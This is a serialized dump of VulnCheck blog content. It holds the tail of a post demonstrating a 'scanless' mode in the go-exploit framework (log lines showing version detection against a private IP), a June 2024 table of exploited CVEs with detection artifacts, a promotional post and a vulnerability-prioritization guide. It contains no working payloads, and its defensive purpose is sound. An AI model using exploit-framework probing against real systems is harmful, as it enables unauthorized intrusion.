73,71286,38979],{"class":1391},[1373,71288,183],{"class":1387},[1373,71290,38984],{"class":4640},[1373,71292,5417],{"class":1397},[1373,71294,445],{"class":1391},[1373,71296,38991],{"class":4640},[1373,71298,5417],{"class":1397},[1373,71300,71166],{"class":1391},[1373,71302,38999],{"class":4640},[1373,71304,5417],{"class":1397},[1373,71306,71171],{"class":1391},[1373,71308,39007],{"class":4640},[1373,71310,5417],{"class":1397},[1373,71312,5971],{"class":1391},[1373,71314,4883],{"class":1387},[1373,71316,39016],{"class":1391},[1373,71318,183],{"class":1387},[1373,71320,39021],{"class":1391},[1373,71322,71323,71325,71327,71329,71331,71333,71335,71337,71339,71341,71343,71345,71347,71349,71351,71353,71355],{"class":1375,"line":1852},[1373,71324,38930],{"class":4640},[1373,71326,5417],{"class":1397},[1373,71328,71272],{"class":1391},[1373,71330,38938],{"class":4640},[1373,71332,5417],{"class":1397},[1373,71334,38943],{"class":1391},[1373,71336,38946],{"class":4640},[1373,71338,5417],{"class":1397},[1373,71340,183],{"class":1387},[1373,71342,69881],{"class":1391},[1373,71344,183],{"class":1387},[1373,71346,38991],{"class":4640},[1373,71348,5417],{"class":1397},[1373,71350,71166],{"class":1391},[1373,71352,38999],{"class":4640},[1373,71354,5417],{"class":1397},[1373,71356,69644],{"class":1391},[1373,71358,71359,71361,71363,71366,71368,71370,71373,71375,71377,71379,71382],{"class":1375,"line":4692},[1373,71360,38930],{"class":4640},[1373,71362,5417],{"class":1397},[1373,71364,71365],{"class":1391},"2024-07-23T10:47:41.288-04:00",[1373,71367,38938],{"class":4640},[1373,71369,5417],{"class":1397},[1373,71371,71372],{"class":1391},"TRACE",[1373,71374,38946],{"class":4640},[1373,71376,5417],{"class":1397},[1373,71378,183],{"class":1387},[1373,71380,71381],{"class":1391},"HTTP cache hit: http:\u002F\u002F10.9.49.88:8090\u002F",[1373,71383,19057],{"class":1387},[1373,71385,71386,71388,71390,71393,71395,71397,71399,71401,71403,71405,71407,71409,71411,71413,71415,71417,71419,71421,71423,71425],{"class":1375,"line":4724},[1373,71387,38930],{"class":4640},[1373,71389,5417],{"class":1397},[1373,71391,71392],{"class":1391},"2024-07-23T10:47:41.289-04:00",[1373,71394,38938],{"class":4640},[1373,71396,5417],{"class":1397},[1373,71398,39062],{"class":1391},[1373,71400,38946],{"class":4640},[1373,71402,5417],{"class":1397},[1373,71404,183],{"class":1387},[1373,71406,45779],{"class":1391},[1373,71408,183],{"class":1387},[1373,71410,38991],{"class":4640},[1373,71412,5417],{"class":1397},[1373,71414,71166],{"class":1391},[1373,71416,38999],{"class":4640},[1373,71418,5417],{"class":1397},[1373,71420,71171],{"class":1391},[1373,71422,45796],{"class":4640},[1373,71424,5417],{"class":1397},[1373,71426,45801],{"class":1391},[1373,71428,71429,71431,71433,71435,71437,71439,71441,71443,71445,71447,71449,71451,71453,71455,71457,71459,71461],{"class":1375,"line":4756},[1373,71430,38930],{"class":4640},[1373,71432,5417],{"class":1397},[1373,71434,71392],{"class":1391},[1373,71436,38938],{"class":4640},[1373,71438,5417],{"class":1397},[1373,71440,38943],{"class":1391},[1373,71442,38946],{"class":4640},[1373,71444,5417],{"class":1397},[1373,71446,183],{"class":1387},[1373,71448,45824],{"class":1391},[1373,71450,183],{"class":1387},[1373,71452,38991],{"class":4640},[1373,71454,5417],{"class":1397},[1373,71456,71166],{"class":1391},[1373,71458,38999],{"class":4640},[1373,71460,5417],{"class":1397},[1373,71462,69644],{"class":1391},[1373,71464,71465,71467,71469,71471,71473,71475,71477,71479,71481,71483,71485],{"class":1375,"line":4768},[1373,71466,38930],{"class":4640},[1373,71468,5417],{"class":1397},[1373,71470,71392],{"class":1391},[1373,71472,38938],{"class":4640},[1373,71474,5417],{"class":1397},[1373,71476,71372],{"class":1391},[1373,71478,38946],{"class":4640},[1373,71480,5417],{"class":1397},[1373,71482,183],{"class":1387},[1373,71484,71381],{"class":1391},[1373,71486,19057],{"class":1387},[1373,71488,71489,71491,71493,71495,71497,71499,71501,71503,71505,71507,71510,71512,71514,71516,71518,71520,71522,71524,71526,71528],{"class":1375,"line":4792},[1373,71490,38930],{"class":4640},[1373,71492,5417],{"class":1397},[1373,71494,71392],{"class":1391},[1373,71496,38938],{"class":4640},[1373,71498,5417],{"class":1397},[1373,71500,45854],{"class":1391},[1373,71502,38946],{"class":4640},[1373,71504,5417],{"class":1397},[1373,71506,183],{"class":1387},[1373,71508,71509],{"class":1391},"The reported version is 8.5.3",[1373,71511,183],{"class":1387},[1373,71513,38991],{"class":4640},[1373,71515,5417],{"class":1397},[1373,71517,71166],{"class":1391},[1373,71519,38999],{"class":4640},[1373,71521,5417],{"class":1397},[1373,71523,71171],{"class":1391},[1373,71525,45880],{"class":4640},[1373,71527,5417],{"class":1397},[1373,71529,71530],{"class":1391},"8.5.3\n",[1373,71532,71533,71535,71537,71540,71542,71544,71546,71548,71550,71552,71554,71556,71558,71560,71562,71564,71566,71568,71570,71572],{"class":1375,"line":4798},[1373,71534,38930],{"class":4640},[1373,71536,5417],{"class":1397},[1373,71538,71539],{"class":1391},"2024-07-23T10:47:41.290-04:00",[1373,71541,38938],{"class":4640},[1373,71543,5417],{"class":1397},[1373,71545,39062],{"class":1391},[1373,71547,38946],{"class":4640},[1373,71549,5417],{"class":1397},[1373,71551,183],{"class":1387},[1373,71553,45908],{"class":1391},[1373,71555,183],{"class":1387},[1373,71557,38991],{"class":4640},[1373,71559,5417],{"class":1397},[1373,71561,71166],{"class":1391},[1373,71563,38999],{"class":4640},[1373,71565,5417],{"class":1397},[1373,71567,71171],{"class":1391},[1373,71569,45925],{"class":4640},[1373,71571,5417],{"class":1397},[1373,71573,45930],{"class":1391},[18,71575,71576,71577,71580,71581,71584],{},"Scanless makes a lot of sense for both attackers and defenders, and we don’t think there is any other framework that is doing quite what we are doing here. If you find this compelling, come hack with us on ",[47,71578,20558],{"href":14297,"rel":71579},[51]," or check out our ",[47,71582,1245],{"href":45535,"rel":71583},[51]," offering.",[2901,71586,71587],{},"html pre.shiki code .sR7ES, html code.shiki .sR7ES{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sFhLe, html code.shiki .sFhLe{--shiki-light:#91B859;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .sSsL9, html code.shiki .sSsL9{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#FD971F}",{"title":219,"searchDepth":220,"depth":220,"links":71589},[71590,71591,71592,71593,71594],{"id":69408,"depth":220,"text":69409},{"id":69736,"depth":220,"text":69737},{"id":69752,"depth":220,"text":69753},{"id":70167,"depth":220,"text":70168},{"id":70643,"depth":220,"text":70644},"Demonstrating the new scanless feature in the go-exploit exploit framework.",{"slug":71597},"vulncheck-goes-scanless",{"title":69353,"description":71595},"blog\u002Fvulncheck-goes-scanless",[23275],"xbczeo3UfYP5mttPmACtEK6cKhloelUSJbj2sTv3Y_Y",{"id":71603,"title":71604,"articles":71605,"authors":71609,"body":71611,"date":69096,"description":72025,"extension":234,"image":7,"link":7,"meta":72026,"navigation":237,"path":72028,"seo":72029,"series":7,"stem":72030,"subtype":7,"tags":72031,"__hash__":72032},"blog\u002Fblog\u002Finitial-access-intelligence-june-2024.md","VulnCheck Initial Access Intelligence Update - June 2024",[71606],{"title":71607,"source":61436,"link":71608,"date":69142},"Risky Biz News: CrowdStrike faulty update affects 8.5 million Windows systems","https:\u002F\u002Fnews.risky.biz\u002Frisky-biz-news-crowdstrike-faulty-update-affects-8-5-million-windows-systems\u002F?ref=risky-business-news-newsletter",[71610],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":71612,"toc":72021},[71613,71615,71618,71624,71627,71643,71647,72014,72016],[18,71614,68846],{},[18,71616,71617],{},"In June 2024, VulnCheck developed new Initial Access Intelligence (IAI) artifacts for 15 CVEs, covering 13 different vendors and 13 different products.",[18,71619,71620],{},[68,71621],{":width":10862,"alt":71622,"src":71623},"Initial Access Intelligence - June 2024","\u002Fblog\u002Finitial-access-intelligence-june-2024\u002Fvulncheck-initial-access-june.png",[18,71625,71626],{},"To provide better visibility into these updates, we’ve broken down June’s Initial Access Intelligence Artifacts by CVE. For each CVE, we provide a range of detection tools including:",[22,71628,71629,71631,71633,71635,71637,71639,71641],{},[25,71630,325],{},[25,71632,59440],{},[25,71634,59443],{},[25,71636,59446],{},[25,71638,59449],{},[25,71640,59452],{},[25,71642,64745],{},[61,71644,71646],{"id":71645},"june-2024-initial-access-artifacts","June 2024 Initial Access Artifacts",[307,71648,71649,71671],{},[310,71650,71651],{},[313,71652,71653,71655,71657,71659,71661,71663,71665,71667,71669],{},[316,71654,59471],{},[316,71656,59474],{},[316,71658,319],{},[316,71660,59479],{},[316,71662,59482],{},[316,71664,59485],{},[316,71666,59488],{},[316,71668,61654],{},[316,71670,61657],{},[336,71672,71673,71696,71719,71742,71764,71786,71809,71832,71855,71878,71901,71923,71946,71969,71991],{},[313,71674,71675,71678,71681,71684,71686,71688,71690,71692,71694],{},[341,71676,71677],{},"Progress Telerik Report Server",[341,71679,71680],{},"2024-06-03",[341,71682,71683],{},"CVE-2024-4358",[341,71685],{},[341,71687],{},[341,71689,59510],{},[341,71691,59510],{},[341,71693,59510],{},[341,71695],{},[313,71697,71698,71701,71704,71707,71709,71711,71713,71715,71717],{},[341,71699,71700],{},"Apache HugeGraph Gremlin Filter Bypass",[341,71702,71703],{},"2024-06-05",[341,71705,71706],{},"CVE-2024-27348",[341,71708,59510],{},[341,71710,59510],{},[341,71712,59510],{},[341,71714,59510],{},[341,71716,59510],{},[341,71718],{},[313,71720,71721,71724,71727,71730,71732,71734,71736,71738,71740],{},[341,71722,71723],{},"Check Point Security Gateway Path Traversal",[341,71725,71726],{},"2024-06-06",[341,71728,71729],{},"CVE-2024-24919",[341,71731,59510],{},[341,71733],{},[341,71735,59510],{},[341,71737,59510],{},[341,71739,59510],{},[341,71741],{},[313,71743,71744,71747,71749,71752,71754,71756,71758,71760,71762],{},[341,71745,71746],{},"Apache OFBiz Path Traversal RCE",[341,71748,71726],{},[341,71750,71751],{},"CVE-2024-32113",[341,71753,59510],{},[341,71755,59510],{},[341,71757,59510],{},[341,71759,59510],{},[341,71761,59510],{},[341,71763],{},[313,71765,71766,71769,71772,71774,71776,71778,71780,71782,71784],{},[341,71767,71768],{},"PHP CGI Argument Injection",[341,71770,71771],{},"2024-06-08",[341,71773,1510],{},[341,71775,59510],{},[341,71777,59510],{},[341,71779,59510],{},[341,71781,59510],{},[341,71783,59510],{},[341,71785],{},[313,71787,71788,71791,71794,71797,71799,71801,71803,71805,71807],{},[341,71789,71790],{},"Kyocera MFP Address Book Credential Leak",[341,71792,71793],{},"2024-06-12",[341,71795,71796],{},"CVE-2022-1026",[341,71798,59510],{},[341,71800],{},[341,71802,59510],{},[341,71804,59510],{},[341,71806,59510],{},[341,71808],{},[313,71810,71811,71814,71817,71820,71822,71824,71826,71828,71830],{},[341,71812,71813],{},"Sophos UTM 9 WebAdmin SID Command Injection",[341,71815,71816],{},"2024-06-13",[341,71818,71819],{},"CVE-2020-25223",[341,71821,59510],{},[341,71823],{},[341,71825,59510],{},[341,71827,59510],{},[341,71829,59510],{},[341,71831],{},[313,71833,71834,71837,71840,71843,71845,71847,71849,71851,71853],{},[341,71835,71836],{},"SolarWinds Serv-U InternalDir Directory Traversal",[341,71838,71839],{},"2024-06-14",[341,71841,71842],{},"CVE-2024-28995",[341,71844,59510],{},[341,71846,59510],{},[341,71848,59510],{},[341,71850,59510],{},[341,71852,59510],{},[341,71854],{},[313,71856,71857,71860,71863,71866,71868,71870,71872,71874,71876],{},[341,71858,71859],{},"Build You Own Botnet Web UI RCE",[341,71861,71862],{},"2024-06-18",[341,71864,71865],{},"CVE-2024-6131",[341,71867,59510],{},[341,71869],{},[341,71871,59510],{},[341,71873,59510],{},[341,71875,59510],{},[341,71877],{},[313,71879,71880,71883,71886,71889,71891,71893,71895,71897,71899],{},[341,71881,71882],{},"Ivanti Endpoint Manager (EPM) SQL Injection RCE",[341,71884,71885],{},"2024-06-21",[341,71887,71888],{},"CVE-2024-29824",[341,71890,59510],{},[341,71892],{},[341,71894,59510],{},[341,71896,59510],{},[341,71898,59510],{},[341,71900],{},[313,71902,71903,71906,71908,71911,71913,71915,71917,71919,71921],{},[341,71904,71905],{},"Zyxel NAS simZysh Python Injection",[341,71907,71885],{},[341,71909,71910],{},"CVE-2024-29973",[341,71912,59510],{},[341,71914],{},[341,71916,59510],{},[341,71918,59510],{},[341,71920,59510],{},[341,71922],{},[313,71924,71925,71928,71931,71934,71936,71938,71940,71942,71944],{},[341,71926,71927],{},"Empire C2 path traversal RCE",[341,71929,71930],{},"2024-06-24",[341,71932,71933],{},"CVE-2024-6127",[341,71935,59510],{},[341,71937],{},[341,71939,59510],{},[341,71941],{},[341,71943],{},[341,71945],{},[313,71947,71948,71951,71954,71957,71959,71961,71963,71965,71967],{},[341,71949,71950],{},"AVideo Remote Code Execution",[341,71952,71953],{},"2024-06-25",[341,71955,71956],{},"CVE-2024-31819",[341,71958,59510],{},[341,71960,59510],{},[341,71962,59510],{},[341,71964,59510],{},[341,71966,59510],{},[341,71968,59510],{},[313,71970,71971,71974,71976,71979,71981,71983,71985,71987,71989],{},[341,71972,71973],{},"XWiki Database Search Code Injection",[341,71975,71953],{},[341,71977,71978],{},"CVE-2024-31982",[341,71980,59510],{},[341,71982,59510],{},[341,71984,59510],{},[341,71986,59510],{},[341,71988,59510],{},[341,71990],{},[313,71992,71993,71996,71999,72002,72004,72006,72008,72010,72012],{},[341,71994,71995],{},"Progress MOVEit Transfer SFTP Authentication Bypass",[341,71997,71998],{},"2024-06-28",[341,72000,72001],{},"CVE-2024-5806",[341,72003],{},[341,72005,59510],{},[341,72007,59510],{},[341,72009,59510],{},[341,72011,59510],{},[341,72013,59510],{},[61,72015,59851],{"id":59850},[18,72017,59854,72018],{},[47,72019,59857],{"href":59857,"rel":72020},[51],{"title":219,"searchDepth":220,"depth":220,"links":72022},[72023,72024],{"id":71645,"depth":220,"text":71646},{"id":59850,"depth":220,"text":59851},"In June 2024, we developed new Initial Access Intelligence (IAI) artifacts for 15 CVEs, covering 13 different vendors and 13 different products.",{"slug":72027},"initial-access-intelligence-june-2024","\u002Fblog\u002Finitial-access-intelligence-june-2024",{"title":71604,"description":72025},"blog\u002Finitial-access-intelligence-june-2024",[1281],"UqUZsmgHpVp7glv8EsM0TH0ZN53aGru4XVpbJYFNR7E",{"id":72034,"title":72035,"articles":7,"authors":72036,"body":72038,"date":69073,"description":72123,"extension":234,"image":7,"link":7,"meta":72124,"navigation":237,"path":72126,"seo":72127,"series":7,"stem":72128,"subtype":7,"tags":72129,"__hash__":72130},"blog\u002Fblog\u002Ftop-5-reasons-to-use-vulncheck-community.md","Top 5 Reasons to Use VulnCheck Community",[72037],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":72039,"toc":72115},[72040,72043,72046,72050,72057,72061,72068,72072,72075,72082,72086,72093,72097,72104,72106,72108,72110],[18,72041,72042],{},"VulnCheck Community provides security and product teams with access to the premier source for open Vulnerability and Exploit Intelligence including VulnCheck KEV, NVD++ and VulnCheck XDB.",[18,72044,72045],{},"To help gain better insight in to the value of VulnCheck community we've put together the top 5 reasons to use VulnCheck Community.",[61,72047,72049],{"id":72048},"_2600-known-exploited-vulnerabilities","2,600+ Known Exploited Vulnerabilities",[18,72051,72052,72056],{},[47,72053,72055],{"href":2871,"rel":72054},[51],"VulnCheck Known Exploited Vulnerabilities (KEV) catalog"," makes it easy for enterprises, government agencies, and vendors, to know which vulnerabilities have been reported as exploited in the wild. VulnCheck provides citations for each and every CVE, so security teams have a clearer picture of why the vulnerability is on the list.",[61,72058,72060],{"id":72059},"fast-accurate-cpe","Fast & Accurate CPE",[18,72062,72063,72064],{},"VulnCheck NVD++ delivers the NIST NVD enriched with VulnCheck Common Platform Enumeration (CPE) data to help fill the gap that NVD has left as they slowed processing CVE’s.\n",[47,72065,72066],{"href":72066,"rel":72067},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fnvd-cpe",[51],[61,72069,72071],{"id":72070},"an-enterprise-alternative-to-nist-nvd","An Enterprise Alternative to NIST NVD",[18,72073,72074],{},"With NIST NVD delivering inconsistent and unreliable service, VulnCheck fills the gap, delivering reliable access to NVD++ and VulnCheck KEV services through enterprise grade API’s that can be accessed by any VulnCheck community member. Documentation on how to use our NVD++ API can be found here:",[18,72076,72077,72078],{},"NVD++: ",[47,72079,72080],{"href":72080,"rel":72081},"https:\u002F\u002Fdocs.vulncheck.com\u002Fcommunity\u002Fnist-nvd\u002Fnvd-2",[51],[61,72083,72085],{"id":72084},"curated-git-exploits","Curated Git Exploits",[18,72087,72088,72089],{},"VulnCheck XDB is an index of exploit proof-of-concept code in Git repositories, programmatically compiled with validation steps that involve human analysis and automated block lists to ensure the exploits are valid.\n",[47,72090,72091],{"href":72091,"rel":72092},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002F",[51],[61,72094,72096],{"id":72095},"free-to-use-w-attribution","Free to Use w\u002F Attribution",[18,72098,72099,72100],{},"Leveraging VulnCheck KEV and NVD++ and the data in it, in your own production, solution, or service, is easy to do at no additional cost, but requires prominent attribution to VulnCheck.\n",[47,72101,72102],{"href":72102,"rel":72103},"https:\u002F\u002Fdocs.vulncheck.com\u002Fcommunity\u002Fvulncheck-kev\u002Fattribution",[51],[61,72105,202],{"id":201},[18,72107,205],{},[18,72109,208],{},[18,72111,211,72112,217],{},[47,72113,216],{"href":214,"rel":72114},[51],{"title":219,"searchDepth":220,"depth":220,"links":72116},[72117,72118,72119,72120,72121,72122],{"id":72048,"depth":220,"text":72049},{"id":72059,"depth":220,"text":72060},{"id":72070,"depth":220,"text":72071},{"id":72084,"depth":220,"text":72085},{"id":72095,"depth":220,"text":72096},{"id":201,"depth":220,"text":202},"VulnCheck Community delivers timely and valuable vulnerability intelligence at machine speeds",{"slug":72125},"top-5-reasons-to-use-vulncheck-community","\u002Fblog\u002Ftop-5-reasons-to-use-vulncheck-community",{"title":72035,"description":72123},"blog\u002Ftop-5-reasons-to-use-vulncheck-community",[33173],"WQWwCDGIgmx7fYQXal8LE_VnyLRUDdVieewRhXfwB1M",{"id":72132,"title":66054,"articles":7,"authors":72133,"body":72135,"date":71953,"description":72152,"extension":234,"image":7,"link":7,"meta":72322,"navigation":237,"path":72324,"seo":72325,"series":7,"stem":72326,"subtype":7,"tags":7,"__hash__":72327},"blog\u002Fblog\u002Fvulnerability-prioritization.md",[72134],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":72136,"toc":72317},[72137,72141,72144,72147,72150,72153,72157,72161,72164,72167,72175,72178,72182,72185,72195,72198,72202,72206,72209,72216,72220,72223,72228,72231,72238,72242,72245,72248,72271,72275,72278,72281,72289,72293,72296,72306,72308,72310,72312],[18,72138,72139],{},[68,72140],{":width":10862,"alt":68102,"src":68103},[18,72142,72143],{},"According to the Verizon DBIR, vulnerability exploitation in breaches is up 180% from last year. More unfortunate news for defenders? One of the most significant challenges security teams face today is knowing which vulnerabilities to prioritize.",[18,72145,72146],{},"Security practitioners have long struggled to make informed decisions due to limited exploit evidence and threat context. Having the right threat context is critical for driving effective remediation outcomes, especially with limited resources.",[18,72148,72149],{},"At VulnCheck, we deliver the necessary threat context and intelligence teams need to make smarter, faster and better informed decisions about which vulnerabilities to remediate first.",[18,72151,72152],{},"To help security practitioners prioritize vulnerabilities using exploit evidence, we've outlined key considerations and strategies in this blog. Alongside exploit intelligence, it’s crucial to incorporate environmental and asset context using decision-based frameworks such as Stakeholder-Specific Vulnerability Categorization.",[1920,72154,72156],{"id":72155},"what-exploit-evidence-should-be-prioritized-first","What Exploit Evidence Should Be Prioritized First?",[61,72158,72160],{"id":72159},"known-exploited-vulnerabilities-kev","Known Exploited Vulnerabilities (KEV)",[18,72162,72163],{},"A Known Exploited Vulnerability is a one with confirmed exploitation evidence. Depending on the asset context, these should be treated with urgency and remediated as soon as possible..",[18,72165,72166],{},"The importance of remediating Known Exploited Vulnerabilities is underscored by CISA’s BOD 22-01, which mandates federal agencies address such vulnerabilities. CISA states, “Known exploited vulnerabilities should be the top priority for remediation.”",[18,72168,72169,72170,72174],{},"In our ",[47,72171,57777],{"href":72172,"rel":72173},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fstate-of-exploitation-a-decade#how-many-vulnerabilities-are-known-to-be-exploited-in-the-wild",[51]," published in May, we observed that 1.1% of vulnerabilities over the past decade are known to be exploited in the wild.",[18,72176,72177],{},"If you’re looking for insight beyond CISA’s KEV, the VulnCheck KEV is a community resource that offers organizations expanded visibility into more than 2,500 known exploited vulnerabilities. That’s a 130% increase over CISA’s (KEV) catalog with data from hundreds of sources worldwide.",[1920,72179,72181],{"id":72180},"what-evidence-can-be-used-to-further-prioritize-known-exploited-vulnerabilities","What Evidence Can Be Used to Further Prioritize Known Exploited Vulnerabilities?",[18,72183,72184],{},"Additional evidence can help determine the prioritization of a known exploited vulnerability. Organizations may consider:",[22,72186,72187,72190,72193],{},[25,72188,72189],{},"Ransomware: Vulnerabilities used in ransomware campaigns are often prioritized due to their widespread impact.",[25,72191,72192],{},"Botnets: Vulnerabilities exploited by botnets, a collection of infected computers controlled by a common attacker, are critical to address.",[25,72194,60554],{},[18,72196,72197],{},"It’s also critical to take immediate action when a known exploited vulnerability is exposed on the internet.",[1920,72199,72201],{"id":72200},"what-vulnerabilities-should-be-considered-after-known-exploited-vulnerabilities","What Vulnerabilities Should Be Considered After Known Exploited Vulnerabilities?",[61,72203,72205],{"id":72204},"weaponized-vulnerabilities","Weaponized Vulnerabilities",[18,72207,72208],{},"Weaponized vulnerabilities are those with explicit malicious intent or reported exploitation. These include exploits within malware or those facilitating easy exploitation (Projects such as: MetaSploit, VulnCheck IAI, CANVAS, Core Impact). Weaponized exploits often have secondary payloads, droppers, or implants.",[18,72210,72169,72211,72215],{},[47,72212,57777],{"href":72213,"rel":72214},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fstate-of-exploitation-a-decade#how-many-vulnerabilities-are-known-to-be-weaponized",[51]," published in May, we observed 2% of vulnerabilities over the past decade that have been weaponized.",[1920,72217,72219],{"id":72218},"how-does-exploit-code-availability-factor-into-prioritization","How Does Exploit Code Availability Factor into Prioritization?",[18,72221,72222],{},"Proof of Concept (POC) exploit code demonstrates exploitation and indicates risk. POC exploits, such as blog posts, curl requests, or Python scripts, are often used in real-world attacks. The number of POC exploits associated with a vulnerability correlates with its likelihood of being weaponized or exploited.",[18,72224,72225],{},[68,72226],{":width":10862,"alt":68102,"src":72227},"\u002Fblog\u002Fvulnerability-prioritization\u002Fexploitation-mapped-to-exploit-counts.png",[18,72229,72230],{},"Another consideration for using POC exploit’s for vulnerability prioritization is ensuring that the POCs are validated to ensure they are actually real POCs. It’s not uncommon for code to be posted claiming to be an exploit when, in fact, the code does not contain an exploit or, even worse, it contains malware. VulnCheck validates POC exploits to ensure they are legitimate POC exploits.",[18,72232,72169,72233,72237],{},[47,72234,57777],{"href":72235,"rel":72236},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fstate-of-exploitation-a-decade#how-many-vulnerabilities-have-a-publicly-available-proof-of-concept-exploit",[51]," published in May, we observed 31% of vulnerabilities over the past decade that have proof-of-concept exploit code.",[1920,72239,72241],{"id":72240},"what-other-considerations-should-i-use-when-prioritizing-vulnerability-remediation","What Other Considerations Should I Use When Prioritizing Vulnerability Remediation?",[18,72243,72244],{},"While this post primarily focuses on prioritizing vulnerabilities based on evidence of exploitation, there are additional factors to consider. Incorporating these factors within decision-based frameworks like Stakeholder-Specific Vulnerability Categorization (SSVC) can provide a more comprehensive approach.\nOften, vulnerability attributes beyond threat intelligence can help provide further visibility into the risk a vulnerability might pose. Attributes such as CVSS metrics, CAPEC, CWE, MITRE ATT&CK, threat actors, targeted industries, targeted countries, and categorizations are frequently used by VulnCheck customers to determine the risk a vulnerability poses within their environment.",[18,72246,72247],{},"Beyond exploitation evidence, consider asking the following questions:",[22,72249,72250,72253,72256,72259,72262,72265,72268],{},[25,72251,72252],{},"Is the device\u002Fapplication connected to the internet?",[25,72254,72255],{},"Is the device\u002Fapplication used for initial access?",[25,72257,72258],{},"Is the device\u002Fapplication controlled by a user and susceptible to phishing attacks?",[25,72260,72261],{},"Is the vulnerability remotely exploitable?",[25,72263,72264],{},"Is the vulnerability automatable?",[25,72266,72267],{},"Is the vulnerability reachable?",[25,72269,72270],{},"Are there mitigations in place for the vulnerability?",[1920,72272,72274],{"id":72273},"when-should-i-use-a-scoring-system-such-as-cvss-or-epss","When Should I Use a Scoring System such as CVSS or EPSS?",[18,72276,72277],{},"VulnCheck provides CVSS and EPSS scoring systems as data points for decision-making.",[18,72279,72280],{},"There are important considerations:",[22,72282,72283,72286],{},[25,72284,72285],{},"CVSS: Base scores do not account for exploitation evidence without enrichment (CVSS-BT). Organizations required to use CVSS should enrich scores with exploit intelligence and environmental context. VulnCheck provides automated CVSS-BT enrichment. Organizations that are in highly regulated industries often opt to use CVSS-BT and are required to use CVSS scoring.",[25,72287,72288],{},"EPSS: The Exploit Prediction Scoring System predicts the likelihood of exploitation within the next 30 days. While helpful in identifying vulnerabilities that could pose a threat to an organization, the score lacks any context and often overlooks known exploitation, weaponized vulnerabilities and vulnerabilities with high exploit counts. EPSS should be used as a supplementary data point for longer-tail prioritization after addressing higher-risk vulnerabilities such as known exploitation, weaponization and vulnerabilities with higher exploit counts. If you plan to use EPSS with a decision-based framework with SSVC, you can also consider defining thresholds within your prioritization schema.",[1920,72290,72292],{"id":72291},"taking-the-next-steps-in-evidence-based-prioritization","Taking The Next Steps in Evidence-Based Prioritization",[18,72294,72295],{},"Prioritizing vulnerabilities effectively requires a comprehensive approach that integrates exploit evidence, environmental context, and additional risk factors. By utilizing threat intelligence and vulnerability attributes, organizations can make informed decisions in prioritizing vulnerabilities and reducing an organization's overall risk.",[18,72297,72298,72299,982,72302,72305],{},"At VulnCheck, we provide the tools and intelligence necessary to navigate the complex landscape of vulnerability management. Our resources, such as the ",[47,72300,1233],{"href":2871,"rel":72301},[51],[47,72303,216],{"href":214,"rel":72304},[51],", empower security practitioners to prioritize and remediate vulnerabilities 